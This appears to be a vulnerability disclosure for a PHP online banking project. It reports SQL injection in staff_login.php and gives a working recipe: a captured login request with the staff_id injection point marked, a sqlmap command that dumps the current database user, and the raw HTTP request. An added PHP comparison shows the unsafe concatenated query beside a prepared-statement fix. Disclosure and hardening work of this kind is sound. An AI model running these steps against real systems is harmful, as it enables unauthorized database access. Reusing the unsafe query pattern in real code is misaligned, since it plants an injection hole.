Online Banking System SQL Injection

  • Description => SQL injection in staff_login.php

Steps to Reproduce

  • Staff Login -> Staff ID -> Staff Password -> Login -> modify data -> Sqlmap

Exploit

  • Enter a Staff ID and Staff Password, then click Login
  • Capture the login request with Burp Suite
  • Modify the data and save the request as sqli.txt
  • Scan sqli.txt with Sqlmap
python3 sqlmap.py -r sqli.txt --batch --current-user


Vulnerable Code


  • Staff ID and Staff Password are placed into the database query without any filtering or parameter binding
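As an added illustration (not the project's code, which this advisory only shows as a screenshot), the unsafe pattern described above beside a hardened version that binds the input as data with a prepared statement; the table name, column names and the use of stored password hashes are assumptions:

```php
<?php
// Added illustration, not the project's own code. Table/column names are assumed.

// --- Unsafe: user input becomes part of the SQL text ---
function staff_login_unsafe(mysqli $db, string $staff_id, string $password): ?array
{
    // staff_id and password are concatenated straight into the query string
    $sql = "SELECT id, name FROM staff WHERE staff_id = '$staff_id' "
         . "AND password = '$password' LIMIT 1";
    $res = $db->query($sql);            // whatever was typed is executed as SQL
    $row = $res ? $res->fetch_assoc() : null;
    return is_array($row) ? $row : null;
}

// --- Hardened: prepared statement, input is bound as a value, never as SQL ---
function staff_login_safe(mysqli $db, string $staff_id, string $password): ?array
{
    // Allowlist the identifier shape (assumed format) so junk is rejected early
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $staff_id)) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT id, name, password_hash FROM staff WHERE staff_id = ? LIMIT 1'
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $staff_id);  // bound parameter, not string concatenation
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // The password is checked against a stored hash and never reaches the SQL text
    if (!is_array($row) || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// Usage (assumed connection details):
// $db    = new mysqli('localhost', 'dbuser', 'dbpass', 'online_banking');
// $staff = staff_login_safe($db, $_POST['staff_id'] ?? '', $_POST['password'] ?? '');
```

The allowlist check on staff_id is defence in depth only; the prepared statement is what removes the injection.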

Information Disclosure


POC

Injection Point

staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGIN
  • Request
POST /Online-Banking/staff_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close

staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGIN